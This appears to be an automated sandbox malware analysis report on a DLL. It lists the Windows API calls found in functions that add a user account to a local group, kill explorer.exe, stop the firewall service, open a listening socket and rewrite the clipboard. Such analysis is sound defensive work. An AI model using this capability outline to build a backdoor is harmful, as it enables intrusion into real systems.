                                                          • Opcode Fuzzy Hash: 0afe2ad8e16ea5edbc017d365728db05ca0ba4cd117a679420f1a44199d0639f
                                                          • Instruction Fuzzy Hash: BE210735284751BBF230EB64DC4AFDB3B94BB84B10F240614FB697E1D0DAA465048B6A
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,?,00000065), ref: 100090AA
                                                          • wsprintfA.USER32 ref: 100090FA
                                                          • FindFirstFileA.KERNEL32(?,?,?,100FA614,?,00000065), ref: 10009110
                                                          • LocalAlloc.KERNEL32(00000040,00002800,00000000,?,00000065), ref: 10009146
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042,?,00000065), ref: 10009174
                                                          • lstrlenA.KERNEL32(?,?,00000065), ref: 10009203
                                                          • FindNextFileA.KERNEL32(?,?,?,00000065), ref: 10009256
                                                          • LocalFree.KERNEL32(00000000,?,00000065), ref: 10009272
                                                          • FindClose.KERNEL32(?,?,00000065), ref: 1000927D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindLocal$AllocFilelstrlen$CloseFirstFreeNextwsprintf
                                                          • String ID: .$h
                                                          • API String ID: 4283800025-2131999284
                                                          • Opcode ID: 3d4794a39b754fa284c176265fc0d8f280d752618cf25aabed4a2790a94c1acf
                                                          • Instruction ID: 429df1e4e3a9b0687acd726eb786cb4cdb3391103595e477c9a2abab359b95e6
                                                          • Opcode Fuzzy Hash: 3d4794a39b754fa284c176265fc0d8f280d752618cf25aabed4a2790a94c1acf
                                                          • Instruction Fuzzy Hash: 2951287560C3829BE710CF289C84ADBBBE5EF99384F144A58F8D897381D279990DC762
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025AC9
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025AD9
                                                          • lstrlenA.KERNEL32(00000000), ref: 10025AE2
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 10024614
                                                            • Part of subcall function 100245F0: #823.MFC42(00000002,?,00000000,00000000), ref: 10024621
                                                            • Part of subcall function 100245F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1002463D
                                                          • NetUserAdd.NETAPI32 ref: 10025B38
                                                          • #825.MFC42(?), ref: 10025B46
                                                          • #825.MFC42(?,?), ref: 10025B50
                                                          • wcscpy.MSVCRT ref: 10025B94
                                                          • #825.MFC42(?), ref: 10025B9F
                                                          • #825.MFC42(?,?), ref: 10025BA9
                                                          • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BCC
                                                          • #825.MFC42(00000000,00000000,00000000,00000003,?,00000001,?,00000000,00000001,?,?), ref: 10025BD4
                                                          • LocalFree.KERNEL32(?,00000001,?,00000000,00000001,?,?), ref: 10025C05
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825$lstrlen$ByteCharLocalMultiWide$#823FreeGroupMembersUserwcscpy
                                                          • String ID:
                                                          • API String ID: 3899135135-0
                                                          • Opcode ID: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                          • Instruction ID: dd9d3f93371bab7a31d82c422f9be74c5db956489815e8898b81c9b0b0312487
                                                          • Opcode Fuzzy Hash: 845040a6a147bf0244a5e108915e50923d3870f156928ecec06d720133b77a1b
                                                          • Instruction Fuzzy Hash: 7D41B4B56083046BD710DB74DC81EAFB7ECEFC4704F44092DF58497242EAB9E9498B62
                                                          APIs
                                                            • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                            • Part of subcall function 1002C6A0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                            • Part of subcall function 1002C6A0: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000ED2D
                                                          • Process32First.KERNEL32(00000000,00000128), ref: 1000ED4F
                                                          • _strcmpi.MSVCRT ref: 1000ED70
                                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 1000ED81
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000ED8A
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1000ED92
                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000), ref: 1000ED9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadProcessProcess32$CloseCreateFirstHandleNextOpenSnapshotTerminateToolhelp32_strcmpi
                                                          • String ID: SeDebugPrivilege$explorer.exe
                                                          • API String ID: 3814622859-2721386251
                                                          • Opcode ID: 9745fbd0434098cbd2d8b7dbb2f7fa8ad6dc817a89ea0a6b86a541c905211a0a
                                                          • Instruction ID: 17e0e04e845da399990fac659a5be735f6de37b5642c8976c51b599fa26cdcf9
                                                          • Opcode Fuzzy Hash: 9745fbd0434098cbd2d8b7dbb2f7fa8ad6dc817a89ea0a6b86a541c905211a0a
                                                          • Instruction Fuzzy Hash: 9611D6B66003497BF310EBB0AC46FE7779CEB84381F440926FF05A2181EA65FD1846B2
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,?), ref: 10023A21
                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10023A35
                                                          • htons.WS2_32 ref: 10023A68
                                                          • bind.WS2_32 ref: 10023A83
                                                          • listen.WS2_32(00000000,00000032), ref: 10023A94
                                                          • accept.WS2_32(00000000,00000000,00000000), ref: 10023ABD
                                                          • malloc.MSVCRT ref: 10023AC3
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00023710,00000000,00000000,?), ref: 10023ADF
                                                          • Sleep.KERNEL32(000003E8), ref: 10023AEE
                                                          • CloseHandle.KERNEL32(00000000), ref: 10023AF7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateHandleSleepStartupThreadacceptbindhtonslistenmallocsocket
                                                          • String ID:
                                                          • API String ID: 1905318980-0
                                                          • Opcode ID: 6aad2d46c7c87ead6b1222c858f8ef9459774bff7ca3c081f511d59da73b22f3
                                                          • Instruction ID: 28454ae119833d2f4dc16d51d0059342e59e328b12dcd3a5c90a667a38171ed6
                                                          • Opcode Fuzzy Hash: 6aad2d46c7c87ead6b1222c858f8ef9459774bff7ca3c081f511d59da73b22f3
                                                          • Instruction Fuzzy Hash: BE21D6346483116BF310DF68EC8ABAB77A8FF84750F404628F698D62E0E7B199048627
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 100026B3
                                                          • GetClipboardData.USER32(00000001), ref: 100026C7
                                                          • GlobalLock.KERNEL32(00000000), ref: 100026D8
                                                          • EmptyClipboard.USER32 ref: 100026F2
                                                          • GlobalAlloc.KERNEL32(00000002), ref: 1000270A
                                                          • GlobalLock.KERNEL32(00000000), ref: 10002717
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 1000273B
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 10002744
                                                          • GlobalUnlock.KERNEL32(?), ref: 1000274F
                                                          • CloseClipboard.USER32 ref: 10002755
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyOpen
                                                          • String ID:
                                                          • API String ID: 3065066218-0
                                                          • Opcode ID: 2862ed5687d03e5c65a8664783a7ab9890a1c27da8607513131cd222ce1fbffd
                                                          • Instruction ID: eef061908f3c3295b15891c3fed615895cfe21d81dbfaa5e572b4fb253c06cc9
                                                          • Opcode Fuzzy Hash: 2862ed5687d03e5c65a8664783a7ab9890a1c27da8607513131cd222ce1fbffd
                                                          • Instruction Fuzzy Hash: 1F1194392406255FF3189B758C9DA6B7BD8FB846A2F19032DF61AC32E0DFA0DC008660
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 1002699D
                                                          • OpenServiceA.ADVAPI32(00000000,sharedaccess,000F01FF), ref: 100269B0
                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100269BE
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269D3
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10024718), ref: 100269E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQueryStatusToken
                                                          • String ID: SeDebugPrivilege$sharedaccess
                                                          • API String ID: 3393504433-1846105483
                                                          • Opcode ID: e6682fc845112422c817af6fc84500fcc42e45783356eb9191f629a16cf909fd
                                                          • Instruction ID: 15e74d9ebd8c7f86553c6ce66e6eb84fb0c1eec04d1206a1703c2b0d94a4763a
                                                          • Opcode Fuzzy Hash: e6682fc845112422c817af6fc84500fcc42e45783356eb9191f629a16cf909fd
                                                          • Instruction Fuzzy Hash: EEF0F639650224BBE210BB148C8AFFB3E68FF95791F44011AF608A9191EBB45844CAB2
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 10017BB2
                                                          • EmptyClipboard.USER32 ref: 10017BBE
                                                          • GlobalAlloc.KERNEL32(00002000,?,?,?), ref: 10017BCE
                                                          • GlobalLock.KERNEL32(00000000), ref: 10017BDC
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 10017BF9
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 10017C02
                                                          • GlobalFree.KERNEL32(00000000), ref: 10017C09
                                                          • CloseClipboard.USER32 ref: 10017C10
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                          • String ID:
                                                          • API String ID: 453615576-0
                                                          • Opcode ID: b4994271ed0c5f6ad7c9827fe64acb0f777f19826ff97a28270b989e17eee570
                                                          • Instruction ID: db7201b96ab1820305f6fb52e99ee6ce304ff54deb9d779612551a26aa299f3d
                                                          • Opcode Fuzzy Hash: b4994271ed0c5f6ad7c9827fe64acb0f777f19826ff97a28270b989e17eee570
                                                          • Instruction Fuzzy Hash: 61F036752016219FE7146B604CCCBEF36A8FB48752B490519F90AD6251CB649940C7B1
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 100025B8
                                                          • GetClipboardData.USER32(00000001), ref: 100025C6
                                                          • GlobalLock.KERNEL32(00000000), ref: 100025CF
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 10002609
                                                          • CloseClipboard.USER32 ref: 1000260F
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 10002632
                                                          • CloseClipboard.USER32 ref: 10002638
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseUnlock$DataLockOpen
                                                          • String ID:
                                                          • API String ID: 2537359085-0
                                                          • Opcode ID: 80ece2687852f306fd33edd9e14cf1056a4f7933bde801836cb5a50ead5f4239
                                                          • Instruction ID: fa833299b88c5f4a584283747ecb7ea9d0db2f1ad11210ff9961461b47ce4595
                                                          • Opcode Fuzzy Hash: 80ece2687852f306fd33edd9e14cf1056a4f7933bde801836cb5a50ead5f4239
                                                          • Instruction Fuzzy Hash: 0001B5792106145BF3089B358C8DAAB3B98FBC0321F18072AF91B961E1EFE5ED048664
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                          • GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID:
                                                          • API String ID: 3398352648-0
                                                          • Opcode ID: 4016afdebf76fc38c603403ce2775b0087815ffa4e94011ab6c2084e23305a80
                                                          • Instruction ID: 9ea1a39ba13499be5e37f09f5477951cbb04746b7bbf0bdf0a23c0e989a9349b
                                                          • Opcode Fuzzy Hash: 4016afdebf76fc38c603403ce2775b0087815ffa4e94011ab6c2084e23305a80
                                                          • Instruction Fuzzy Hash: AA0144B9654300ABE304EF74CC89FAB77A4FB84700F88891CF64A86290D675D4448B61
                                                          Strings
                                                          • *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 10080402
                                                          • *** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100806E0
                                                          • IVOP, xrefs: 100802F0
                                                          • *** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100802CC
                                                          • PVOP, xrefs: 1008022C
                                                          • *** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 100804BE
                                                          • *** END, xrefs: 1008083B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** END$*** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$IVOP$PVOP
                                                          • API String ID: 0-2740609450
                                                          • Opcode ID: 59cae3bf1122f43cd0cd32d226ccac3b0ecc167948723bb549a9c5797abe5bd6
                                                          • Instruction ID: 552bda2c2a28fec5ad751e390478c72a3e76191201ba06dd6fcbd107c7d5512c
                                                          • Opcode Fuzzy Hash: 59cae3bf1122f43cd0cd32d226ccac3b0ecc167948723bb549a9c5797abe5bd6
                                                          • Instruction Fuzzy Hash: CAA226B5A042889FDB68CF18C881BEA77E5FF89344F10861DFD898B351D774AA41CB91
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10029105
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000010,00000000,00000000), ref: 1002911D
                                                          • GetLastError.KERNEL32 ref: 10029123
                                                          • CloseHandle.KERNEL32(?), ref: 10029134
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID:
                                                          • API String ID: 3398352648-0
                                                          • Opcode ID: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                          • Instruction ID: 4db5a6e2c7b4cb126f103a4b1f94b4cfd3d626149b56619aedb11a4ed5bc1c08
                                                          • Opcode Fuzzy Hash: 149c958cf4e409a043c1ff8710811fbd874f2c7f626f077d67b57da5f78a4f18
                                                          • Instruction Fuzzy Hash: F4018879654310AFE304EB78CC89F9B77A8FB84B00F448A1DF68D96290D775D8048761
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 1001A107
                                                          • CoCreateInstance.OLE32(100EACE0,00000000,00000001,100EACC0,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001A11F
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
